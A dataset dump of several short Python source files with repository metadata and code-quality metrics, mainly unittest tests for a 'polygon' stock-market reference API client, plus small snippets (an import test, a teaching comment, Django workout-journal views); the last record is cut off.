hexsha
string | size
int64 | ext
string | lang
string | max_stars_repo_path
string | max_stars_repo_name
string | max_stars_repo_head_hexsha
string | max_stars_repo_licenses
list | max_stars_count
int64 | max_stars_repo_stars_event_min_datetime
string | max_stars_repo_stars_event_max_datetime
string | max_issues_repo_path
string | max_issues_repo_name
string | max_issues_repo_head_hexsha
string | max_issues_repo_licenses
list | max_issues_count
int64 | max_issues_repo_issues_event_min_datetime
string | max_issues_repo_issues_event_max_datetime
string | max_forks_repo_path
string | max_forks_repo_name
string | max_forks_repo_head_hexsha
string | max_forks_repo_licenses
list | max_forks_count
int64 | max_forks_repo_forks_event_min_datetime
string | max_forks_repo_forks_event_max_datetime
string | content
string | avg_line_length
float64 | max_line_length
int64 | alphanum_fraction
float64 | qsc_code_num_words_quality_signal
int64 | qsc_code_num_chars_quality_signal
float64 | qsc_code_mean_word_length_quality_signal
float64 | qsc_code_frac_words_unique_quality_signal
float64 | qsc_code_frac_chars_top_2grams_quality_signal
float64 | qsc_code_frac_chars_top_3grams_quality_signal
float64 | qsc_code_frac_chars_top_4grams_quality_signal
float64 | qsc_code_frac_chars_dupe_5grams_quality_signal
float64 | qsc_code_frac_chars_dupe_6grams_quality_signal
float64 | qsc_code_frac_chars_dupe_7grams_quality_signal
float64 | qsc_code_frac_chars_dupe_8grams_quality_signal
float64 | qsc_code_frac_chars_dupe_9grams_quality_signal
float64 | qsc_code_frac_chars_dupe_10grams_quality_signal
float64 | qsc_code_frac_chars_replacement_symbols_quality_signal
float64 | qsc_code_frac_chars_digital_quality_signal
float64 | qsc_code_frac_chars_whitespace_quality_signal
float64 | qsc_code_size_file_byte_quality_signal
float64 | qsc_code_num_lines_quality_signal
float64 | qsc_code_num_chars_line_max_quality_signal
float64 | qsc_code_num_chars_line_mean_quality_signal
float64 | qsc_code_frac_chars_alphabet_quality_signal
float64 | qsc_code_frac_chars_comments_quality_signal
float64 | qsc_code_cate_xml_start_quality_signal
float64 | qsc_code_frac_lines_dupe_lines_quality_signal
float64 | qsc_code_cate_autogen_quality_signal
float64 | qsc_code_frac_lines_long_string_quality_signal
float64 | qsc_code_frac_chars_string_length_quality_signal
float64 | qsc_code_frac_chars_long_word_length_quality_signal
float64 | qsc_code_frac_lines_string_concat_quality_signal
float64 | qsc_code_cate_encoded_data_quality_signal
float64 | qsc_code_frac_chars_hex_words_quality_signal
float64 | qsc_code_frac_lines_prompt_comments_quality_signal
float64 | qsc_code_frac_lines_assert_quality_signal
float64 | qsc_codepython_cate_ast_quality_signal
float64 | qsc_codepython_frac_lines_func_ratio_quality_signal
float64 | qsc_codepython_cate_var_zero_quality_signal
bool | qsc_codepython_frac_lines_pass_quality_signal
float64 | qsc_codepython_frac_lines_import_quality_signal
float64 | qsc_codepython_frac_lines_simplefunc_quality_signal
float64 | qsc_codepython_score_lines_no_logic_quality_signal
float64 | qsc_codepython_frac_lines_print_quality_signal
float64 | qsc_code_num_words
int64 | qsc_code_num_chars
int64 | qsc_code_mean_word_length
int64 | qsc_code_frac_words_unique
null | qsc_code_frac_chars_top_2grams
int64 | qsc_code_frac_chars_top_3grams
int64 | qsc_code_frac_chars_top_4grams
int64 | qsc_code_frac_chars_dupe_5grams
int64 | qsc_code_frac_chars_dupe_6grams
int64 | qsc_code_frac_chars_dupe_7grams
int64 | qsc_code_frac_chars_dupe_8grams
int64 | qsc_code_frac_chars_dupe_9grams
int64 | qsc_code_frac_chars_dupe_10grams
int64 | qsc_code_frac_chars_replacement_symbols
int64 | qsc_code_frac_chars_digital
int64 | qsc_code_frac_chars_whitespace
int64 | qsc_code_size_file_byte
int64 | qsc_code_num_lines
int64 | qsc_code_num_chars_line_max
int64 | qsc_code_num_chars_line_mean
int64 | qsc_code_frac_chars_alphabet
int64 | qsc_code_frac_chars_comments
int64 | qsc_code_cate_xml_start
int64 | qsc_code_frac_lines_dupe_lines
int64 | qsc_code_cate_autogen
int64 | qsc_code_frac_lines_long_string
int64 | qsc_code_frac_chars_string_length
int64 | qsc_code_frac_chars_long_word_length
int64 | qsc_code_frac_lines_string_concat
null | qsc_code_cate_encoded_data
int64 | qsc_code_frac_chars_hex_words
int64 | qsc_code_frac_lines_prompt_comments
int64 | qsc_code_frac_lines_assert
int64 | qsc_codepython_cate_ast
int64 | qsc_codepython_frac_lines_func_ratio
int64 | qsc_codepython_cate_var_zero
int64 | qsc_codepython_frac_lines_pass
int64 | qsc_codepython_frac_lines_import
int64 | qsc_codepython_frac_lines_simplefunc
int64 | qsc_codepython_score_lines_no_logic
int64 | qsc_codepython_frac_lines_print
int64 | effective
string | hits
int64 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
f6127632022f5cc00e048d1782b414138296778b
| 25,336
|
py
|
Python
|
tests/reference_tests.py
|
webclinic017/polygon
|
bddbb6ab7a250d3a40f88c8973484c399b72d7d5
|
[
"MIT"
] | null | null | null |
tests/reference_tests.py
|
webclinic017/polygon
|
bddbb6ab7a250d3a40f88c8973484c399b72d7d5
|
[
"MIT"
] | null | null | null |
tests/reference_tests.py
|
webclinic017/polygon
|
bddbb6ab7a250d3a40f88c8973484c399b72d7d5
|
[
"MIT"
] | null | null | null |
# ========================================================= #
import unittest
import polygon
from polygon import cred
import datetime
from requests.models import Response
import asyncio
from httpx import Response as HttpxResponse
import polygon.enums as enums
# ========================================================= #
# Test Runners
# ========================================================= #
# Helper Function for testing asyncio components
def async_test(coro):
def wrapper(*args, **kwargs):
loop = asyncio.new_event_loop()
try:
return loop.run_until_complete(coro(*args, **kwargs))
finally:
loop.close()
return wrapper
# ========================================================= #
class TestReferences(unittest.TestCase):
def test_get_tickers(self):
with polygon.ReferenceClient(cred.KEY) as client:
data = client.get_tickers('AMD')
data1 = client.get_tickers(search='GO', limit=20, market='stocks')
data2 = client.get_tickers(symbol_type='CS', market='stocks', raw_response=True, limit=120)
data3 = client.get_tickers(limit=5, market='stocks', all_pages=True, max_pages=2)
data4 = client.get_tickers(limit=5, market='stocks', all_pages=True, max_pages=2,
merge_all_pages=False)
self.assertIsInstance(data, dict)
self.assertIsInstance(data1, dict)
self.assertIsInstance(data2, Response)
self.assertIsInstance(data3, list)
self.assertIsInstance(data4, list)
self.assertIsInstance(data2.json(), dict)
self.assertEqual(data['count'], 1)
self.assertEqual(data1['count'], 20)
self.assertEqual(len(data3), 10)
self.assertEqual(len(data4), 2)
self.assertEqual(data2.json()['count'], 120)
# Testing without context manager
client = polygon.ReferenceClient(cred.KEY)
data = client.get_tickers(search='GO', limit=30, market='stocks')
data1 = client.get_next_page(data)
client.close()
self.assertIsInstance(data, dict)
self.assertIsInstance(data1, dict)
self.assertEqual(data['count'], 30)
self.assertEqual(data1['count'], 30)
def test_get_ticker_types(self):
with polygon.ReferenceClient(cred.KEY) as client:
data = client.get_ticker_types()
data1 = client.get_ticker_types(asset_class='stocks', raw_response=True)
self.assertIsInstance(data, dict)
self.assertIsInstance(data1, Response)
self.assertIsInstance(data1.json(), dict)
self.assertEqual(data['status'], 'OK')
self.assertEqual(data1.json()['status'], 'OK')
# without context manager
client = polygon.ReferenceClient(cred.KEY)
data = client.get_ticker_types()
client.close()
self.assertIsInstance(data, dict)
self.assertEqual(data['status'], 'OK')
def test_get_ticker_details(self):
with polygon.ReferenceClient(cred.KEY) as client:
data = client.get_ticker_details('AMD')
data1 = client.get_ticker_details('AMD', date='2021-06-28', raw_response=True)
self.assertIsInstance(data, dict)
self.assertIsInstance(data1, Response)
self.assertIsInstance(data1.json(), dict)
self.assertEqual(data['status'], 'OK')
self.assertEqual(data1.json()['status'], 'OK')
# without context manager
client = polygon.ReferenceClient(cred.KEY)
data = client.get_ticker_details('AMD')
client.close()
self.assertIsInstance(data, dict)
self.assertEqual(data['status'], 'OK')
def test_get_option_contracts(self):
with polygon.ReferenceClient(cred.KEY) as client:
data = client.get_option_contracts('AMD', limit=10)
data1 = client.get_option_contracts('AMD', limit=10, contract_type='call', raw_response=True)
data3 = client.get_option_contracts('AMD', limit=5, all_pages=True, max_pages=2)
data4 = client.get_option_contracts('AMD', limit=5, all_pages=True, max_pages=2, merge_all_pages=False)
self.assertIsInstance(data, dict)
self.assertIsInstance(data1, Response)
self.assertIsInstance(data3, list)
self.assertIsInstance(data3, list)
self.assertIsInstance(data1.json(), dict)
self.assertEqual(data['status'], 'OK')
self.assertEqual(len(data3), 10)
self.assertEqual(len(data4), 2)
self.assertEqual(data1.json()['status'], 'OK')
# without context manager
client = polygon.ReferenceClient(cred.KEY)
data = client.get_option_contracts('AMD', limit=10)
client.close()
self.assertIsInstance(data, dict)
self.assertEqual(data['status'], 'OK')
def test_get_ticker_news(self):
with polygon.ReferenceClient(cred.KEY) as client:
data = client.get_ticker_news(limit=10)
data1 = client.get_ticker_news('AMD', limit=10, raw_response=True)
data3 = client.get_ticker_news(limit=5, all_pages=True, max_pages=2)
data4 = client.get_ticker_news(limit=5, all_pages=True, max_pages=2, merge_all_pages=False)
self.assertIsInstance(data, dict)
self.assertIsInstance(data1, Response)
self.assertIsInstance(data3, list)
self.assertIsInstance(data4, list)
self.assertIsInstance(data1.json(), dict)
self.assertEqual(data['status'], 'OK')
self.assertEqual(len(data3), 10)
self.assertEqual(len(data4), 2)
self.assertEqual(data1.json()['status'], 'OK')
# without context manager
client = polygon.ReferenceClient(cred.KEY)
data = client.get_ticker_news('AMD', limit=10)
data1 = client.get_next_page(data)
client.close()
self.assertIsInstance(data, dict)
self.assertIsInstance(data1, dict)
self.assertEqual(data['status'], 'OK')
self.assertEqual(data1['status'], 'OK')
def test_get_stock_dividends(self):
with polygon.ReferenceClient(cred.KEY) as client:
data = client.get_stock_dividends('AMD')
data1 = client.get_stock_dividends('AMD', raw_response=True)
data3 = client.get_stock_dividends('AMD', limit=5, all_pages=True, max_pages=2)
data4 = client.get_stock_dividends('AMD', limit=5, all_pages=True, max_pages=2, merge_all_pages=False)
self.assertIsInstance(data, dict)
self.assertIsInstance(data1, Response)
self.assertIsInstance(data3, list)
self.assertIsInstance(data4, list)
self.assertIsInstance(data1.json(), dict)
self.assertEqual(data['status'], 'OK')
self.assertEqual(len(data3) <= 10, True)
self.assertEqual(len(data4) <= 2, True)
self.assertEqual(data1.json()['status'], 'OK')
# without context manager
client = polygon.ReferenceClient(cred.KEY)
data = client.get_stock_dividends('AMD')
client.close()
self.assertIsInstance(data, dict)
self.assertEqual(data['status'], 'OK')
def test_get_stock_financials_vx(self):
with polygon.ReferenceClient(cred.KEY) as client:
data = client.get_stock_financials_vx('AMD', limit=10)
data1 = client.get_stock_financials_vx('AMD', include_sources=True, raw_response=True)
self.assertIsInstance(data, dict)
self.assertIsInstance(data1, Response)
self.assertIsInstance(data1.json(), dict)
self.assertEqual(data['status'], 'OK')
self.assertEqual(data1.json()['status'], 'OK')
# without context manager
client = polygon.ReferenceClient(cred.KEY)
data = client.get_stock_financials_vx('AMD', limit=10)
client.close()
self.assertIsInstance(data, dict)
self.assertEqual(data['status'], 'OK')
def test_get_stock_splits(self):
with polygon.ReferenceClient(cred.KEY) as client:
data = client.get_stock_splits('AMD')
data1 = client.get_stock_splits('AMD', raw_response=True)
data3 = client.get_stock_splits('AMD', limit=5, all_pages=True, max_pages=2)
data4 = client.get_stock_splits('AMD', limit=5, all_pages=True, max_pages=2, merge_all_pages=False)
self.assertIsInstance(data, dict)
self.assertIsInstance(data1, Response)
self.assertIsInstance(data3, list)
self.assertIsInstance(data4, list)
self.assertIsInstance(data1.json(), dict)
self.assertEqual(data['status'], 'OK')
self.assertEqual(len(data3) <= 10, True)
self.assertEqual(len(data4) <= 2, True)
self.assertEqual(data1.json()['status'], 'OK')
# without context manager
client = polygon.ReferenceClient(cred.KEY)
data = client.get_stock_splits('AMD')
client.close()
self.assertIsInstance(data, dict)
self.assertEqual(data['status'], 'OK')
def test_get_market_holidays(self):
with polygon.ReferenceClient(cred.KEY) as client:
data = client.get_market_holidays()
data1 = client.get_market_holidays(raw_response=True)
self.assertIsInstance(data, list)
self.assertIsInstance(data1, Response)
self.assertIsInstance(data1.json(), list)
# without context manager
client = polygon.ReferenceClient(cred.KEY)
data = client.get_market_holidays()
client.close()
self.assertIsInstance(data, list)
def test_get_market_status(self):
with polygon.ReferenceClient(cred.KEY) as client:
data = client.get_market_status()
data1 = client.get_market_status(raw_response=True)
self.assertIsInstance(data, dict)
self.assertIsInstance(data1, Response)
self.assertIsInstance(data1.json(), dict)
# without context manager
client = polygon.ReferenceClient(cred.KEY)
data = client.get_market_status()
client.close()
self.assertIsInstance(data, dict)
def test_get_condition_mappings(self):
with polygon.ReferenceClient(cred.KEY) as client:
data = client.get_condition_mappings()
data1 = client.get_condition_mappings('quotes', raw_response=True)
self.assertIsInstance(data, dict)
self.assertIsInstance(data1, Response)
self.assertIsInstance(data1.json(), dict)
# without context manager
client = polygon.ReferenceClient(cred.KEY)
data = client.get_condition_mappings('trades')
client.close()
self.assertIsInstance(data, dict)
def test_get_conditions(self):
with polygon.ReferenceClient(cred.KEY) as client:
data = client.get_conditions()
data1 = client.get_conditions('options', data_type='nbbo', raw_response=True)
self.assertIsInstance(data, dict)
self.assertIsInstance(data1, Response)
self.assertIsInstance(data1.json(), dict)
self.assertEqual(data['status'], 'OK')
self.assertEqual(data1.json()['status'], 'OK')
# without context manager
client = polygon.ReferenceClient(cred.KEY)
data = client.get_conditions()
client.close()
self.assertIsInstance(data, dict)
self.assertEqual(data['status'], 'OK')
def test_get_exchanges(self):
with polygon.ReferenceClient(cred.KEY) as client:
data = client.get_exchanges()
data1 = client.get_exchanges('stocks', raw_response=True)
self.assertIsInstance(data, dict)
self.assertIsInstance(data1, Response)
self.assertIsInstance(data1.json(), dict)
self.assertEqual(data['status'], 'OK')
self.assertEqual(data1.json()['status'], 'OK')
# without context manager
client = polygon.ReferenceClient(cred.KEY)
data = client.get_exchanges(locale='us')
client.close()
self.assertIsInstance(data, dict)
self.assertEqual(data['status'], 'OK')
@async_test
async def test_async_get_tickers(self):
async with polygon.ReferenceClient(cred.KEY, use_async=True) as client:
data = await client.get_tickers('AMD')
data1 = await client.get_tickers(search='GO', limit=20, market='stocks')
data2 = await client.get_tickers(symbol_type='CS', market='stocks', raw_response=True, limit=120)
data3 = await client.get_tickers(limit=5, market='stocks', all_pages=True, max_pages=2)
data4 = await client.get_tickers(limit=5, market='stocks', all_pages=True, max_pages=2,
merge_all_pages=False)
self.assertIsInstance(data, dict)
self.assertIsInstance(data1, dict)
self.assertIsInstance(data2, HttpxResponse)
self.assertIsInstance(data3, list)
self.assertIsInstance(data4, list)
self.assertIsInstance(data2.json(), dict)
self.assertEqual(data['count'], 1)
self.assertEqual(data1['count'], 20)
self.assertEqual(len(data3), 10)
self.assertEqual(len(data4), 2)
self.assertEqual(data2.json()['count'], 120)
# Testing without context manager
client = polygon.ReferenceClient(cred.KEY, True)
data = await client.get_tickers(search='GO', limit=30, market='stocks')
data1 = await client.get_next_page(data)
await client.close()
self.assertIsInstance(data, dict)
self.assertIsInstance(data1, dict)
self.assertEqual(data['count'], 30)
self.assertEqual(data1['count'], 30)
@async_test
async def test_async_get_ticker_types(self):
async with polygon.ReferenceClient(cred.KEY, True) as client:
data = await client.get_ticker_types()
data1 = await client.get_ticker_types(asset_class='stocks', raw_response=True)
self.assertIsInstance(data, dict)
self.assertIsInstance(data1, HttpxResponse)
self.assertIsInstance(data1.json(), dict)
self.assertEqual(data['status'], 'OK')
self.assertEqual(data1.json()['status'], 'OK')
# without context manager
client = polygon.ReferenceClient(cred.KEY, True)
data = await client.get_ticker_types()
await client.close()
self.assertIsInstance(data, dict)
self.assertEqual(data['status'], 'OK')
@async_test
async def test_async_get_ticker_details(self):
async with polygon.ReferenceClient(cred.KEY, True) as client:
data = await client.get_ticker_details('AMD')
data1 = await client.get_ticker_details('AMD', date='2021-06-28', raw_response=True)
self.assertIsInstance(data, dict)
self.assertIsInstance(data1, HttpxResponse)
self.assertIsInstance(data1.json(), dict)
self.assertEqual(data['status'], 'OK')
self.assertEqual(data1.json()['status'], 'OK')
# without context manager
client = polygon.ReferenceClient(cred.KEY, True)
data = await client.get_ticker_details('AMD')
await client.close()
self.assertIsInstance(data, dict)
self.assertEqual(data['status'], 'OK')
@async_test
async def test_async_get_option_contracts(self):
async with polygon.ReferenceClient(cred.KEY, True) as client:
data = await client.get_option_contracts('AMD', limit=10)
data1 = await client.get_option_contracts('AMD', limit=10, contract_type='call', raw_response=True)
data3 = await client.get_option_contracts('AMD', limit=5, all_pages=True, max_pages=2)
data4 = await client.get_option_contracts('AMD', limit=5, all_pages=True, max_pages=2,
merge_all_pages=False)
self.assertIsInstance(data, dict)
self.assertIsInstance(data1, HttpxResponse)
self.assertIsInstance(data3, list)
self.assertIsInstance(data3, list)
self.assertIsInstance(data1.json(), dict)
self.assertEqual(data['status'], 'OK')
self.assertEqual(len(data3), 10)
self.assertEqual(len(data4), 2)
self.assertEqual(data1.json()['status'], 'OK')
# without context manager
client = polygon.ReferenceClient(cred.KEY, True)
data = await client.get_option_contracts('AMD', limit=10)
await client.close()
self.assertIsInstance(data, dict)
self.assertEqual(data['status'], 'OK')
@async_test
async def test_async_get_ticker_news(self):
async with polygon.ReferenceClient(cred.KEY, True) as client:
data = await client.get_ticker_news(limit=10)
data1 = await client.get_ticker_news('AMD', limit=10, raw_response=True)
data3 = await client.get_ticker_news(limit=5, all_pages=True, max_pages=2)
data4 = await client.get_ticker_news(limit=5, all_pages=True, max_pages=2, merge_all_pages=False)
self.assertIsInstance(data, dict)
self.assertIsInstance(data1, HttpxResponse)
self.assertIsInstance(data3, list)
self.assertIsInstance(data4, list)
self.assertIsInstance(data1.json(), dict)
self.assertEqual(data['status'], 'OK')
self.assertEqual(len(data3), 10)
self.assertEqual(len(data4), 2)
self.assertEqual(data1.json()['status'], 'OK')
# without context manager
client = polygon.ReferenceClient(cred.KEY, True)
data = await client.get_ticker_news('AMD', limit=10)
data1 = await client.get_next_page(data)
await client.close()
self.assertIsInstance(data, dict)
self.assertIsInstance(data1, dict)
self.assertEqual(data['status'], 'OK')
self.assertEqual(data1['status'], 'OK')
@async_test
async def test_async_get_stock_dividends(self):
async with polygon.ReferenceClient(cred.KEY, True) as client:
data = await client.get_stock_dividends('AMD')
data1 = await client.get_stock_dividends('AMD', raw_response=True)
data3 = await client.get_stock_dividends('AMD', limit=5, all_pages=True, max_pages=2)
data4 = await client.get_stock_dividends('AMD', limit=5, all_pages=True, max_pages=2, merge_all_pages=False)
self.assertIsInstance(data, dict)
self.assertIsInstance(data1, HttpxResponse)
self.assertIsInstance(data3, list)
self.assertIsInstance(data4, list)
self.assertIsInstance(data1.json(), dict)
self.assertEqual(data['status'], 'OK')
self.assertEqual(len(data3) <= 10, True)
self.assertEqual(len(data4) <= 2, True)
self.assertEqual(data1.json()['status'], 'OK')
# without context manager
client = polygon.ReferenceClient(cred.KEY, True)
data = await client.get_stock_dividends('AMD')
await client.close()
self.assertIsInstance(data, dict)
self.assertEqual(data['status'], 'OK')
@async_test
async def test_async_get_stock_financials_vx(self):
async with polygon.ReferenceClient(cred.KEY, True) as client:
data = await client.get_stock_financials_vx('AMD', limit=10)
data1 = await client.get_stock_financials_vx('AMD', include_sources=True, raw_response=True)
self.assertIsInstance(data, dict)
self.assertIsInstance(data1, HttpxResponse)
self.assertIsInstance(data1.json(), dict)
self.assertEqual(data['status'], 'OK')
self.assertEqual(data1.json()['status'], 'OK')
# without context manager
client = polygon.ReferenceClient(cred.KEY, True)
data = await client.get_stock_financials_vx('AMD', limit=10)
await client.close()
self.assertIsInstance(data, dict)
self.assertEqual(data['status'], 'OK')
@async_test
async def test_async_get_stock_splits(self):
async with polygon.ReferenceClient(cred.KEY, True) as client:
data = await client.get_stock_splits('AMD')
data1 = await client.get_stock_splits('AMD', raw_response=True)
data3 = await client.get_stock_splits('AMD', limit=5, all_pages=True, max_pages=2)
data4 = await client.get_stock_splits('AMD', limit=5, all_pages=True, max_pages=2, merge_all_pages=False)
self.assertIsInstance(data, dict)
self.assertIsInstance(data1, HttpxResponse)
self.assertIsInstance(data3, list)
self.assertIsInstance(data4, list)
self.assertIsInstance(data1.json(), dict)
self.assertEqual(data['status'], 'OK')
self.assertEqual(len(data3) <= 10, True)
self.assertEqual(len(data4) <= 2, True)
self.assertEqual(data1.json()['status'], 'OK')
# without context manager
client = polygon.ReferenceClient(cred.KEY, True)
data = await client.get_stock_splits('AMD')
await client.close()
self.assertIsInstance(data, dict)
self.assertEqual(data['status'], 'OK')
@async_test
async def test_async_get_market_holidays(self):
async with polygon.ReferenceClient(cred.KEY, True) as client:
data = await client.get_market_holidays()
data1 = await client.get_market_holidays(raw_response=True)
self.assertIsInstance(data, list)
self.assertIsInstance(data1, HttpxResponse)
self.assertIsInstance(data1.json(), list)
# without context manager
client = polygon.ReferenceClient(cred.KEY, True)
data = await client.get_market_holidays()
await client.close()
self.assertIsInstance(data, list)
@async_test
async def test_async_get_market_status(self):
async with polygon.ReferenceClient(cred.KEY, True) as client:
data = await client.get_market_status()
data1 = await client.get_market_status(raw_response=True)
self.assertIsInstance(data, dict)
self.assertIsInstance(data1, HttpxResponse)
self.assertIsInstance(data1.json(), dict)
# without context manager
client = polygon.ReferenceClient(cred.KEY, True)
data = await client.get_market_status()
await client.close()
self.assertIsInstance(data, dict)
@async_test
async def test_async_get_condition_mappings(self):
async with polygon.ReferenceClient(cred.KEY, True) as client:
data = await client.get_condition_mappings()
data1 = await client.get_condition_mappings('quotes', raw_response=True)
self.assertIsInstance(data, dict)
self.assertIsInstance(data1, HttpxResponse)
self.assertIsInstance(data1.json(), dict)
# without context manager
client = polygon.ReferenceClient(cred.KEY, True)
data = await client.get_condition_mappings('trades')
await client.close()
self.assertIsInstance(data, dict)
@async_test
async def test_async_get_conditions(self):
async with polygon.ReferenceClient(cred.KEY, True) as client:
data = await client.get_conditions()
data1 = await client.get_conditions('options', data_type='nbbo', raw_response=True)
self.assertIsInstance(data, dict)
self.assertIsInstance(data1, HttpxResponse)
self.assertIsInstance(data1.json(), dict)
self.assertEqual(data['status'], 'OK')
self.assertEqual(data1.json()['status'], 'OK')
# without context manager
client = polygon.ReferenceClient(cred.KEY, True)
data = await client.get_conditions()
await client.close()
self.assertIsInstance(data, dict)
self.assertEqual(data['status'], 'OK')
@async_test
async def test_async_get_exchanges(self):
async with polygon.ReferenceClient(cred.KEY, True) as client:
data = await client.get_exchanges()
data1 = await client.get_exchanges('stocks', raw_response=True)
self.assertIsInstance(data, dict)
self.assertIsInstance(data1, HttpxResponse)
self.assertIsInstance(data1.json(), dict)
self.assertEqual(data['status'], 'OK')
self.assertEqual(data1.json()['status'], 'OK')
# without context manager
client = polygon.ReferenceClient(cred.KEY, True)
data = await client.get_exchanges(locale='us')
await client.close()
self.assertIsInstance(data, dict)
self.assertEqual(data['status'], 'OK')
# ========================================================= #
if __name__ == '__main__':
unittest.main()
# ========================================================= #
| 41.602627
| 120
| 0.62796
| 2,784
| 25,336
| 5.571121
| 0.044899
| 0.167634
| 0.087041
| 0.097228
| 0.952547
| 0.935719
| 0.91844
| 0.907672
| 0.895745
| 0.872534
| 0
| 0.017194
| 0.247079
| 25,336
| 608
| 121
| 41.671053
| 0.795869
| 0.041522
| 0
| 0.755991
| 0
| 0
| 0.033991
| 0
| 0
| 0
| 0
| 0
| 0.470588
| 1
| 0.03268
| false
| 0
| 0.017429
| 0
| 0.056645
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
f64ac8ffeace3807f7c53a8ed1d1414948d44f90
| 81
|
py
|
Python
|
tests/test_Time-for-an-Adventure.py
|
EthanKubistek/Time_for_an_Adventure
|
ab6fa19e9054f710043c3c22b354fd2123defd0d
|
[
"MIT"
] | null | null | null |
tests/test_Time-for-an-Adventure.py
|
EthanKubistek/Time_for_an_Adventure
|
ab6fa19e9054f710043c3c22b354fd2123defd0d
|
[
"MIT"
] | null | null | null |
tests/test_Time-for-an-Adventure.py
|
EthanKubistek/Time_for_an_Adventure
|
ab6fa19e9054f710043c3c22b354fd2123defd0d
|
[
"MIT"
] | null | null | null |
import Time_for_an_Adventure
def test_import():
assert Time_for_an_Adventure
| 20.25
| 32
| 0.839506
| 13
| 81
| 4.692308
| 0.615385
| 0.229508
| 0.295082
| 0.590164
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.123457
| 81
| 4
| 32
| 20.25
| 0.859155
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.333333
| 1
| 0.333333
| true
| 0
| 0.666667
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 8
|
f65de89b311f36e23a144e22129c28607ba7a7bd
| 128
|
py
|
Python
|
week_2/atribuicao_aumentada.py
|
angelitabrg/lih_lab_python2
|
88d19d20704552e1a82c29793073e59dcf4b78c6
|
[
"MIT"
] | null | null | null |
week_2/atribuicao_aumentada.py
|
angelitabrg/lih_lab_python2
|
88d19d20704552e1a82c29793073e59dcf4b78c6
|
[
"MIT"
] | null | null | null |
week_2/atribuicao_aumentada.py
|
angelitabrg/lih_lab_python2
|
88d19d20704552e1a82c29793073e59dcf4b78c6
|
[
"MIT"
] | null | null | null |
'''
2 - Atribuição aumentada (ex.: x += 5):
x = 10
x = x + 10 # x=20
x += 10 # x=30
x *= 2 # x=60
x = 2
x **= 10 # x=1024
'''
| 10.666667
| 39
| 0.429688
| 27
| 128
| 2.037037
| 0.407407
| 0.218182
| 0.290909
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.25
| 0.3125
| 128
| 12
| 40
| 10.666667
| 0.375
| 0.929688
| 0
| null | 0
| null | 0
| 0
| null | 0
| 0
| 0
| null | 1
| null | true
| 0
| 0
| null | null | null | 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
14398dc8ccf97a0e8e9ab64ce5e4e82761fd73be
| 140
|
py
|
Python
|
allelicimbalance/__init__.py
|
anthony-aylward/allelicimbalance
|
8d2ae5d08048e2a0358936ded00f5122f97c2586
|
[
"MIT"
] | null | null | null |
allelicimbalance/__init__.py
|
anthony-aylward/allelicimbalance
|
8d2ae5d08048e2a0358936ded00f5122f97c2586
|
[
"MIT"
] | null | null | null |
allelicimbalance/__init__.py
|
anthony-aylward/allelicimbalance
|
8d2ae5d08048e2a0358936ded00f5122f97c2586
|
[
"MIT"
] | null | null | null |
from allelicimbalance.allelicimbalance import betabinom_test
from allelicimbalance.allelicimbalance import log_posterior_allelic_fold_change
| 70
| 79
| 0.935714
| 15
| 140
| 8.4
| 0.666667
| 0.31746
| 0.571429
| 0.666667
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.05
| 140
| 2
| 79
| 70
| 0.947368
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
145596c508e92da21e16fd89b3d43ff6d361e87b
| 553
|
py
|
Python
|
capstone/workout_journal/frontend/views.py
|
jeffisnotahero/cs50w-final
|
bcc9e28934b66ad15ef78672b6f1a2dd01def5b8
|
[
"BSD-3-Clause"
] | null | null | null |
capstone/workout_journal/frontend/views.py
|
jeffisnotahero/cs50w-final
|
bcc9e28934b66ad15ef78672b6f1a2dd01def5b8
|
[
"BSD-3-Clause"
] | null | null | null |
capstone/workout_journal/frontend/views.py
|
jeffisnotahero/cs50w-final
|
bcc9e28934b66ad15ef78672b6f1a2dd01def5b8
|
[
"BSD-3-Clause"
] | null | null | null |
from django.shortcuts import render
def index(request):
return render(request, 'frontend/index.html')
def detail_plan(request, workout_plan_id):
return render(request, 'frontend/index.html', {
'workout_plan_id' : workout_plan_id
})
def begin_workout(request, workout_plan_id):
return render(request, 'frontend/index.html', {
'workout_plan_id' : workout_plan_id
})
def workout_journal(request, workout_plan_id):
return render(request, 'frontend/index.html', {
'workout_plan_id' : workout_plan_id
})
| 29.105263
| 51
| 0.712477
| 71
| 553
| 5.253521
| 0.239437
| 0.265416
| 0.313673
| 0.289544
| 0.772118
| 0.772118
| 0.675603
| 0.675603
| 0.675603
| 0.675603
| 0
| 0
| 0.175407
| 553
| 19
| 52
| 29.105263
| 0.817982
| 0
| 0
